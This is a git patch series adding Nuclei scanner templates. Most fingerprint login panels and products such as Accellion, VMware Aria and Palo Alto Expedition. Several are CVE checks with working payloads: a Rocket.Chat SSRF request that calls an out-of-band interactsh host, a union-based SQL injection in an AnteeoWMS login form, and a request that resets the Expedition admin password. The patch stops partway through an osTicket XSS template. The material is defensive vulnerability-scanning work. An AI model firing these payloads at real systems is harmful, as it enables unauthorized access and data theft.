mode 100644 index 0000000000..4641a777ad --- /dev/null +++ b/http/technologies/accellion-detect.yaml @@ -0,0 +1,31 @@ +id: accellion-detect + +info: + name: Accellion Detection + author: rxerium + severity: info + description: Dectection of Accellion File Transfer Appliance. + metadata: + verified: true + max-request: 1 + shodan-query: http.body:"/cfadmin/img/accellion-logo.png" + tags: accellion,tech,detect + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/cfadmin/" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '/cfadmin/img/accellion-logo.png' + - 'secured by accellion' + part: body + condition: or \ No newline at end of file From 89927c9e72a2cff82dbeb74b77f6217b1d2b7348 Mon Sep 17 00:00:00 2001 From: Rishi Date: Tue, 8 Oct 2024 20:11:58 +0100 Subject: [PATCH 022/218] remove trailing space --- http/technologies/oracle-fusion-middleware-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/oracle-fusion-middleware-detect.yaml b/http/technologies/oracle-fusion-middleware-detect.yaml index 795775c230..e964814d0b 100644 --- a/http/technologies/oracle-fusion-middleware-detect.yaml +++ b/http/technologies/oracle-fusion-middleware-detect.yaml @@ -15,7 +15,7 @@ requests: - method: GET path: - "{{BaseURL}}" - + matchers-condition: and matchers: - type: status From 9f0f5908d949d6a42bb0597b4678450f476a02a1 Mon Sep 17 00:00:00 2001 From: Rishi Date: Tue, 8 Oct 2024 20:13:55 +0100 Subject: [PATCH 023/218] remove trailing space --- http/technologies/accellion-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/accellion-detect.yaml b/http/technologies/accellion-detect.yaml index 4641a777ad..bc3c3a5c73 100644 --- a/http/technologies/accellion-detect.yaml +++ b/http/technologies/accellion-detect.yaml @@ -4,7 +4,7 @@ info: name: Accellion Detection author: rxerium severity: info - description: Dectection of Accellion File Transfer Appliance. + description: Dectection of Accellion File Transfer Appliance. metadata: verified: true max-request: 1 From b43496b86b0607feacde590f20d239ff4f93708e Mon Sep 17 00:00:00 2001 From: Rishi Date: Wed, 9 Oct 2024 16:29:47 +0100 Subject: [PATCH 024/218] vmware-aria-operations-panel --- .../exposed-panels/aria-operations-panel.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/exposed-panels/aria-operations-panel.yaml diff --git a/http/exposed-panels/aria-operations-panel.yaml b/http/exposed-panels/aria-operations-panel.yaml new file mode 100644 index 0000000000..2814adea19 --- /dev/null +++ b/http/exposed-panels/aria-operations-panel.yaml @@ -0,0 +1,29 @@ +id: vmware-aria-operations-panel + +info: + name: VMware Aria Operations Panel Detection + author: rxerium + severity: info + description: Detects VMware Aria Operations Panel + metadata: + verified: true + max-request: 1 + shodan-query: title:"VMware Aria Operations" + tags: panel,aria-operations,login + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/ui/login.action" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "VMware Aria Operations" + part: body \ No newline at end of file From 5ab13f9dff949d8bcb02f5bff8b0cf24a7d8b27a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 9 Oct 2024 21:49:16 +0530 Subject: [PATCH 025/218] Create CVE-2024-39713.yaml --- http/cves/2024/CVE-2024-39713.yaml | 60 ++++++++++++++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 http/cves/2024/CVE-2024-39713.yaml diff --git a/http/cves/2024/CVE-2024-39713.yaml b/http/cves/2024/CVE-2024-39713.yaml new file mode 100644 index 0000000000..9da04420df --- /dev/null +++ b/http/cves/2024/CVE-2024-39713.yaml @@ -0,0 +1,60 @@ +id: CVE-2024-39713 + +info: + name: Rocket.Chat - Server-Side Request Forgery (SSRF) + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-39713 + - https://hackerone.com/reports/1886954 + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cve-id: CVE-2024-39713 + cwe-id: CWE-918 + epss-score: 0.00087 + epss-percentile: 0.37765 + cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* + metadata: + vendor: rocket.chat + product: rocket.chat + shodan-query: http.title:"rocket.chat" + fofa-query: title="rocket.chat" + google-query: intitle:"rocket.chat" + tags: cve,cve2024,hackerone,ssrf,oast,rocket-chat + +http: + - raw: + - | + POST /api/v1/livechat/sms-incoming/twilio HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "From": "5551123456782", + "To": "5551987654323", + "Body": "SMS message", + "NumMedia": 1, + "MediaUrl0":"http://{{interactsh-url}}", + "MediaContentType0":"application/json" + } + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: content_type + words: + - "text/xml" + + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" From ab224bd458782c5950e511aa343e068eab397975 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 9 Oct 2024 21:51:31 +0530 Subject: [PATCH 026/218] Create CVE-2024-44349.yaml --- http/cves/2024/CVE-2024-44349.yaml | 68 ++++++++++++++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 http/cves/2024/CVE-2024-44349.yaml diff --git a/http/cves/2024/CVE-2024-44349.yaml b/http/cves/2024/CVE-2024-44349.yaml new file mode 100644 index 0000000000..b555d0debb --- /dev/null +++ b/http/cves/2024/CVE-2024-44349.yaml @@ -0,0 +1,68 @@ +id: CVE-2024-44349 + +info: + name: AnteeoWMS < v4.7.34 - Unauthenticated SQL Injection + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB. + reference: + - https://blog.cybergon.com/posts/cve-2024-44349/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-44349 + cwe-id: CWE-89 + metadata: + verified: true + max-request: 2 + shodan-query: html:"ANTEEO" + tags: cve,cve2024,sqli,anteeowms + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /default.aspx HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + part: body + name: viewstate + internal: true + group: 1 + regex: + - 'id="__VIEWSTATE" value="([/a-zA-Z0-9+=]+?)"' + + - type: regex + part: body + name: viewstategen + internal: true + group: 1 + regex: + - 'id="__VIEWSTATEGENERATOR" value="([A-Z0-9]+)"' + + - type: regex + part: body + name: eventval + internal: true + group: 1 + regex: + - 'id="__EVENTVALIDATION" value="([/a-zA-Z0-9+=]+)"' + + - raw: + - | + POST /default.aspx HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewstategen}}&ctl00%24MainContentPlaceHolder%24isCookieErased=&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthLogin=aa'union%20select+cast(@@version%20as%20int),null,null--%20-&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthStr=&DXScript=1_10%2C1_11%2C1_22%2C1_62%2C1_12%2C1_13%2C1_179%2C1_180%2C1_20%2C1_21%2C1_186%2C1_14%2C1_16%2C1_182%2C1_189%2C1_40%2C1_178%2C1_47%2C1_8%2C1_37&DXCss=1_206%2C1_203%2C1_66%2C1_67%2C1_68%2C1_205%2C1_202%2C1_72%2C1_71%2C0_5551%2C0_5556%2C.%2FStyles%2Fwebstyle_02.css%2C0_5390%2C0_5394%2C0_768&__CALLBACKID=ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel&__CALLBACKPARAM=c0%3A%5Bobject%20Object%5D&__EVENTVALIDATION={{urlencode(eventval)}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Conversion failed when converting the nvarchar value 'Microsoft SQL Server' From 724e51943cd80db9394754fcfbdec276dda08d6f Mon Sep 17 00:00:00 2001 From: johnk3r <6247648+johnk3r@users.noreply.github.com> Date: Wed, 9 Oct 2024 14:13:50 -0300 Subject: [PATCH 027/218] Create paloalto-expedition-projet-panel.yaml --- .../paloalto-expedition-projet-panel.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/exposed-panels/paloalto-expedition-projet-panel.yaml diff --git a/http/exposed-panels/paloalto-expedition-projet-panel.yaml b/http/exposed-panels/paloalto-expedition-projet-panel.yaml new file mode 100644 index 0000000000..5ac0287243 --- /dev/null +++ b/http/exposed-panels/paloalto-expedition-projet-panel.yaml @@ -0,0 +1,27 @@ +id: paloalto-expedition-project-panel + +info: + name: Palo Alto Expedition Project Login Panel - Detect + author: johnk3r + severity: info + description: Palo Alto Expedition Project login panel was detected. + metadata: + max-request: 2 + vendor: paloaltonetworks + product: globalprotect + tags: panel,panos,expedition,paloaltonetworks + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "Expedition Project" + + - type: status + status: + - 200 From eb6e5a78c2fb432063d59de6fa67b809a6ab6398 Mon Sep 17 00:00:00 2001 From: johnk3r <6247648+johnk3r@users.noreply.github.com> Date: Wed, 9 Oct 2024 14:16:17 -0300 Subject: [PATCH 028/218] Rename paloalto-expedition-projet-panel.yaml to paloalto-expedition-project-panel.yaml --- ...n-projet-panel.yaml => paloalto-expedition-project-panel.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/exposed-panels/{paloalto-expedition-projet-panel.yaml => paloalto-expedition-project-panel.yaml} (100%) diff --git a/http/exposed-panels/paloalto-expedition-projet-panel.yaml b/http/exposed-panels/paloalto-expedition-project-panel.yaml similarity index 100% rename from http/exposed-panels/paloalto-expedition-projet-panel.yaml rename to http/exposed-panels/paloalto-expedition-project-panel.yaml From d27f60e00893e186d40b69dfb78cef05c804ebbf Mon Sep 17 00:00:00 2001 From: johnk3r <6247648+johnk3r@users.noreply.github.com> Date: Wed, 9 Oct 2024 14:17:31 -0300 Subject: [PATCH 029/218] Update paloalto-expedition-project-panel.yaml --- http/exposed-panels/paloalto-expedition-project-panel.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/paloalto-expedition-project-panel.yaml b/http/exposed-panels/paloalto-expedition-project-panel.yaml index 5ac0287243..aee16e7c28 100644 --- a/http/exposed-panels/paloalto-expedition-project-panel.yaml +++ b/http/exposed-panels/paloalto-expedition-project-panel.yaml @@ -6,9 +6,11 @@ info: severity: info description: Palo Alto Expedition Project login panel was detected. metadata: + verified: "true" max-request: 2 vendor: paloaltonetworks - product: globalprotect + product: expedition + shodan-query: html:"expedition project" tags: panel,panos,expedition,paloaltonetworks http: From 17bbe1ee83de13c8cdf0ac5e8d3b76e7850abc50 Mon Sep 17 00:00:00 2001 From: johnk3r <6247648+johnk3r@users.noreply.github.com> Date: Wed, 9 Oct 2024 14:25:16 -0300 Subject: [PATCH 030/218] Create CVE-2024-5910.yaml --- http/cves/2024/CVE-2024-5910.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/cves/2024/CVE-2024-5910.yaml diff --git a/http/cves/2024/CVE-2024-5910.yaml b/http/cves/2024/CVE-2024-5910.yaml new file mode 100644 index 0000000000..472b95f48e --- /dev/null +++ b/http/cves/2024/CVE-2024-5910.yaml @@ -0,0 +1,30 @@ +id: CVE-2024-5910 + +info: + name: Unauthorized Admin Restore Page + author: johnk3r + severity: critical + description: "CVE-2024-5910 Expedition: Missing Authentication Leads to Admin Account Takeover" + +requests: + - method: GET + path: + - "{{BaseURL}}/OS/startup/restore/restoreAdmin.php" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Connected successfully to the database" + - "Admin user found" + - "Admin password restored to: 'paloalto'" + + - type: word + part: header + words: + - "Apache/2.4.41" + - "Ubuntu" From 5b8e21ec25d98df07be42984c5fc5c823d1fdc96 Mon Sep 17 00:00:00 2001 From: johnk3r <6247648+johnk3r@users.noreply.github.com> Date: Wed, 9 Oct 2024 14:27:38 -0300 Subject: [PATCH 031/218] Update CVE-2024-5910.yaml --- http/cves/2024/CVE-2024-5910.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-5910.yaml b/http/cves/2024/CVE-2024-5910.yaml index 472b95f48e..a3ed660070 100644 --- a/http/cves/2024/CVE-2024-5910.yaml +++ b/http/cves/2024/CVE-2024-5910.yaml @@ -4,6 +4,8 @@ info: name: Unauthorized Admin Restore Page author: johnk3r severity: critical + reference: + - https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise description: "CVE-2024-5910 Expedition: Missing Authentication Leads to Admin Account Takeover" requests: From dbb63ac08fda2b2e6014e3a41cd9a31d8181cbbd Mon Sep 17 00:00:00 2001 From: johnk3r <6247648+johnk3r@users.noreply.github.com> Date: Wed, 9 Oct 2024 14:28:00 -0300 Subject: [PATCH 032/218] Update CVE-2024-5910.yaml --- http/cves/2024/CVE-2024-5910.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-5910.yaml b/http/cves/2024/CVE-2024-5910.yaml index a3ed660070..0a025da755 100644 --- a/http/cves/2024/CVE-2024-5910.yaml +++ b/http/cves/2024/CVE-2024-5910.yaml @@ -1,7 +1,7 @@ id: CVE-2024-5910 info: - name: Unauthorized Admin Restore Page + name: Expedition: Missing Authentication Leads to Admin Account Takeover author: johnk3r severity: critical reference: From b65abab735b00cd6a1c712ad98543714081aa581 Mon Sep 17 00:00:00 2001 From: johnk3r <6247648+johnk3r@users.noreply.github.com> Date: Wed, 9 Oct 2024 14:28:42 -0300 Subject: [PATCH 033/218] Update CVE-2024-5910.yaml --- http/cves/2024/CVE-2024-5910.yaml | 7 ------- 1 file changed, 7 deletions(-) diff --git a/http/cves/2024/CVE-2024-5910.yaml b/http/cves/2024/CVE-2024-5910.yaml index 0a025da755..5a455215ef 100644 --- a/http/cves/2024/CVE-2024-5910.yaml +++ b/http/cves/2024/CVE-2024-5910.yaml @@ -6,7 +6,6 @@ info: severity: critical reference: - https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise - description: "CVE-2024-5910 Expedition: Missing Authentication Leads to Admin Account Takeover" requests: - method: GET @@ -24,9 +23,3 @@ requests: - "Connected successfully to the database" - "Admin user found" - "Admin password restored to: 'paloalto'" - - - type: word - part: header - words: - - "Apache/2.4.41" - - "Ubuntu" From 9a1ad2558c95c55dc274465ec2daf0cd2e1a8b06 Mon Sep 17 00:00:00 2001 From: johnk3r <6247648+johnk3r@users.noreply.github.com> Date: Wed, 9 Oct 2024 14:33:18 -0300 Subject: [PATCH 034/218] Update CVE-2024-5910.yaml --- http/cves/2024/CVE-2024-5910.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-5910.yaml b/http/cves/2024/CVE-2024-5910.yaml index 5a455215ef..2e51e2c4a2 100644 --- a/http/cves/2024/CVE-2024-5910.yaml +++ b/http/cves/2024/CVE-2024-5910.yaml @@ -1,11 +1,10 @@ id: CVE-2024-5910 info: - name: Expedition: Missing Authentication Leads to Admin Account Takeover + name: Palo Alto Expedition - Missing Authentication Leads to Admin Account Takeover author: johnk3r severity: critical - reference: - - https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise + reference: https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise requests: - method: GET From 5d9ed70ec9a0c7107a845e2146404eb3e9e352c1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Oct 2024 00:42:05 +0530 Subject: [PATCH 035/218] fix-template --- http/cves/2024/CVE-2024-5910.yaml | 30 ++++++++++++++++++++++-------- 1 file changed, 22 insertions(+), 8 deletions(-) diff --git a/http/cves/2024/CVE-2024-5910.yaml b/http/cves/2024/CVE-2024-5910.yaml index 2e51e2c4a2..0b4489bd7f 100644 --- a/http/cves/2024/CVE-2024-5910.yaml +++ b/http/cves/2024/CVE-2024-5910.yaml @@ -4,21 +4,35 @@ info: name: Palo Alto Expedition - Missing Authentication Leads to Admin Account Takeover author: johnk3r severity: critical - reference: https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise + description: | + Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition. + reference: |- + https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise + https://security.paloaltonetworks.com/CVE-2024-5910 + classification: + epss-score: 0.00043 + epss-percentile: 0.10397 + metadata: + verified: "true" + max-request: 1 + vendor: paloaltonetworks + product: expedition + shodan-query: http.favicon.hash:1499876150 + tags: cve,cve2024,palo-alto,auth-bypass -requests: +http: - method: GET path: - "{{BaseURL}}/OS/startup/restore/restoreAdmin.php" matchers-condition: and matchers: + - type: word + words: + - "Admin user found" + - "Admin password restored" + condition: and + - type: status status: - 200 - - - type: word - words: - - "Connected successfully to the database" - - "Admin user found" - - "Admin password restored to: 'paloalto'" From d9c8ea370b98dd2eb81077423dd27352d6e377aa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Oct 2024 00:48:32 +0530 Subject: [PATCH 036/218] Update and rename paloalto-expedition-project-panel.yaml to paloalto-expedition-panel.yaml --- ...anel.yaml => paloalto-expedition-panel.yaml} | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) rename http/exposed-panels/{paloalto-expedition-project-panel.yaml => paloalto-expedition-panel.yaml} (52%) diff --git a/http/exposed-panels/paloalto-expedition-project-panel.yaml b/http/exposed-panels/paloalto-expedition-panel.yaml similarity index 52% rename from http/exposed-panels/paloalto-expedition-project-panel.yaml rename to http/exposed-panels/paloalto-expedition-panel.yaml index aee16e7c28..d25aad5254 100644 --- a/http/exposed-panels/paloalto-expedition-project-panel.yaml +++ b/http/exposed-panels/paloalto-expedition-panel.yaml @@ -1,26 +1,31 @@ -id: paloalto-expedition-project-panel +id: paloalto-expedition-panel info: - name: Palo Alto Expedition Project Login Panel - Detect + name: Palo Alto Expedition Project Login - Panel author: johnk3r severity: info - description: Palo Alto Expedition Project login panel was detected. + description: | + Palo Alto Expedition Project login panel was detected. metadata: verified: "true" - max-request: 2 + max-request: 1 vendor: paloaltonetworks product: expedition - shodan-query: html:"expedition project" - tags: panel,panos,expedition,paloaltonetworks + shodan-query: http.favicon.hash:1499876150 + tags: panel,expedition,palo-alto,login http: - method: GET path: - "{{BaseURL}}" + host-redirects: true + max-redirects: 2 + matchers-condition: and matchers: - type: word + part: body words: - "Expedition Project" From 55d532c69e9ca57fdadbfa47e10a0bb62d15708b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Oct 2024 03:43:40 +0530 Subject: [PATCH 037/218] Update and rename aria-operations-panel.yaml to vmware-aria-panel.yaml --- ...ions-panel.yaml => vmware-aria-panel.yaml} | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) rename http/exposed-panels/{aria-operations-panel.yaml => vmware-aria-panel.yaml} (61%) diff --git a/http/exposed-panels/aria-operations-panel.yaml b/http/exposed-panels/vmware-aria-panel.yaml similarity index 61% rename from http/exposed-panels/aria-operations-panel.yaml rename to http/exposed-panels/vmware-aria-panel.yaml index 2814adea19..1a5821da11 100644 --- a/http/exposed-panels/aria-operations-panel.yaml +++ b/http/exposed-panels/vmware-aria-panel.yaml @@ -1,29 +1,29 @@ -id: vmware-aria-operations-panel +id: vmware-aria-panel info: - name: VMware Aria Operations Panel Detection + name: VMware Aria Operations Login - Panel author: rxerium severity: info - description: Detects VMware Aria Operations Panel + description: | + Detects VMware Aria Operations Panel was discovered metadata: verified: true max-request: 1 shodan-query: title:"VMware Aria Operations" - tags: panel,aria-operations,login + tags: panel,aria,login -requests: +http: - method: GET path: - - "{{BaseURL}}" - "{{BaseURL}}/ui/login.action" matchers-condition: and matchers: + - type: word + part: body + words: + - "VMware Aria Operations" + - type: status status: - 200 - - - type: word - words: - - "VMware Aria Operations" - part: body \ No newline at end of file From ea39686f6bfa89823a6ad8a2a0463eb737307161 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Oct 2024 03:49:37 +0530 Subject: [PATCH 038/218] Update and rename oracle-fusion-middleware-detect.yaml to oracle-fusion-detect.yaml --- ...-detect.yaml => oracle-fusion-detect.yaml} | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) rename http/technologies/{oracle-fusion-middleware-detect.yaml => oracle-fusion-detect.yaml} (70%) diff --git a/http/technologies/oracle-fusion-middleware-detect.yaml b/http/technologies/oracle-fusion-detect.yaml similarity index 70% rename from http/technologies/oracle-fusion-middleware-detect.yaml rename to http/technologies/oracle-fusion-detect.yaml index e964814d0b..07230c5e9d 100644 --- a/http/technologies/oracle-fusion-middleware-detect.yaml +++ b/http/technologies/oracle-fusion-detect.yaml @@ -1,28 +1,29 @@ -id: oracle-fusion-middleware-detect +id: oracle-fusion-detect info: - name: Oracle Fusion Middleware Detection + name: Oracle Fusion Middleware - Detection author: rxerium severity: info - description: Oracle Fusion Middleware was detected. + description: + Oracle Fusion Middleware was detected. metadata: verified: true max-request: 1 shodan-query: http.html:"Welcome to Oracle Fusion Middleware" tags: oracle,middleware,detect,tech -requests: +http: - method: GET path: - "{{BaseURL}}" matchers-condition: and matchers: + - type: word + part: body + words: + - "Welcome to Oracle Fusion Middleware" + - type: status status: - 200 - - - type: word - words: - - "Welcome to Oracle Fusion Middleware" - part: body \ No newline at end of file From b25edc095d70603a33ff0a3d645fd009f0335c0b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Oct 2024 04:02:31 +0530 Subject: [PATCH 039/218] fix-template-formatting --- http/technologies/accellion-detect.yaml | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/http/technologies/accellion-detect.yaml b/http/technologies/accellion-detect.yaml index bc3c3a5c73..869d61a4fd 100644 --- a/http/technologies/accellion-detect.yaml +++ b/http/technologies/accellion-detect.yaml @@ -4,28 +4,28 @@ info: name: Accellion Detection author: rxerium severity: info - description: Dectection of Accellion File Transfer Appliance. + description: | + Dectection of Accellion File Transfer Appliance. metadata: verified: true max-request: 1 - shodan-query: http.body:"/cfadmin/img/accellion-logo.png" + shodan-query: html:"/cfadmin/img/" tags: accellion,tech,detect -requests: +http: - method: GET path: - - "{{BaseURL}}" - "{{BaseURL}}/cfadmin/" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word + part: body words: - '/cfadmin/img/accellion-logo.png' - 'secured by accellion' - part: body - condition: or \ No newline at end of file + condition: or + + - type: status + status: + - 200 From 0c0fc1dd346fb2433ae65ac058e6cbd9f1f0cfca Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Oct 2024 04:04:05 +0530 Subject: [PATCH 040/218] fix-lint-error --- http/technologies/oracle-fusion-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/oracle-fusion-detect.yaml b/http/technologies/oracle-fusion-detect.yaml index 07230c5e9d..8d4a0ae6b1 100644 --- a/http/technologies/oracle-fusion-detect.yaml +++ b/http/technologies/oracle-fusion-detect.yaml @@ -4,7 +4,7 @@ info: name: Oracle Fusion Middleware - Detection author: rxerium severity: info - description: + description: | Oracle Fusion Middleware was detected. metadata: verified: true From e46319020259a7bdcaa5d2496928c0dbb99f6c7d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Oct 2024 04:07:32 +0530 Subject: [PATCH 041/218] fix-formatting --- .../veritas-netbackup-panel.yaml | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/http/exposed-panels/veritas-netbackup-panel.yaml b/http/exposed-panels/veritas-netbackup-panel.yaml index 2d95b3072a..ae41a75aee 100644 --- a/http/exposed-panels/veritas-netbackup-panel.yaml +++ b/http/exposed-panels/veritas-netbackup-panel.yaml @@ -1,32 +1,32 @@ -id: veritas-netbackup-opscenter-panel +id: veritas-netbackup-panel info: - name: Veritas NetBackup OpsCenter Analytics Detection - Panel + name: Veritas NetBackup OpsCenter Analytics Login - Panel author: rxerium severity: info - description: A Veritas NetBackup OpsCenter Analytics page was detected. + description: | + A Veritas NetBackup OpsCenter Analytics page was detected. reference: - https://www.veritas.com/ classification: cwe-id: CWE-200 metadata: max-request: 1 - shodan-query: http.html:"Veritas NetBackup OpsCenter Analytics" - tags: panel,veritas,netbackup,opscenter,analytics + shodan-query: html:"Veritas NetBackup OpsCenter Analytics" + tags: panel,veritas,netbackup,opscenter,analytics,login http: - method: GET path: - - "{{BaseURL}}" - - "{{BaseURL}}/opscenter" + - "{{BaseURL}}/opscenter/" matchers-condition: and matchers: - type: word + part: body words: - 'Veritas NetBackup OpsCenter Analytics' - part: body - type: status status: - - 200 \ No newline at end of file + - 200 From e741324b3b29b749273ad9e1103650093cd63d85 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Oct 2024 04:10:55 +0530 Subject: [PATCH 042/218] minor-update --- http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml index 15e55fbad7..b53fbf8217 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml @@ -1,7 +1,7 @@ id: yonyou-u8-crm-sqli info: - name: UFIDA U8 CRM fillbacksetting.php - Sql Injection + name: UFIDA U8 CRM cfillbacksetting.php - SQL Injection author: s4e-io severity: high description: | From 30cacc8fd828262cc2ae8d272534fec96e7ce8d5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Oct 2024 04:14:14 +0530 Subject: [PATCH 043/218] minor-update --- http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml index 5cd274d165..e57c5046e1 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml @@ -1,7 +1,7 @@ id: yonyou-u8-crm-tb-sqli info: - name: UFIDA U8 CRM fillbacksetting.php - Time Based Sql Injection + name: UFIDA U8 CRM fillbacksetting.php - Time Based SQL Injection author: s4e-io severity: high description: | @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="甹揋U8CRM" - tags: yonyou,u8-crm,time-based-sqli + tags: yonyou,u8-crm,sqli http: - raw: From 4965c2f39c0b6d1b2d365d957f4fb93928be83f4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 10 Oct 2024 11:38:45 +0400 Subject: [PATCH 044/218] Create CVE-2018-7192.yaml --- http/cves/2018/CVE-2018-7192.yaml | 74 +++++++++++++++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 http/cves/2018/CVE-2018-7192.yaml diff --git a/http/cves/2018/CVE-2018-7192.yaml b/http/cves/2018/CVE-2018-7192.yaml new file mode 100644 index 0000000000..786df9b723 --- /dev/null +++ b/http/cves/2018/CVE-2018-7192.yaml @@ -0,0 +1,74 @@ +id: CVE-2018-7192 + +info: + name: osTicket < 1.10.2 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross-site scripting (XSS) vulnerability in /ajax.php/form/help-topic in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the "message" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. + remediation: | + Upgrade osTicket to later version to mitigate this vulnerability. + reference: + - https://blog.securityevaluators.com/vulnerabilities-found-in-popular-ticketing-system-dd273bda229c + - https://nvd.nist.gov/vuln/detail/CVE-2018-7192 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-7192 + cwe-id: CWE-79 + epss-score: 0.00172 + epss-percentile: 0.54693 + cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: osticket + product: osticket + shodan-query: title:"osTicket" + fofa-query: title="osticket" + google-query: intitle:"osticket" + tags: cve,cve2018,osticket,xss,authenticated + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /scp/login.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(tolower(body), "osticket")' + internal: true + + extractors: + - type: regex + name: csrftoken + part: body + group: 1 + regex: + - '__CSRFToken__" value="(.*?)"' + internal: true + + - raw: + - | + POST /scp/login.php HTTP/1.1 + Host: {{Hostname}} + 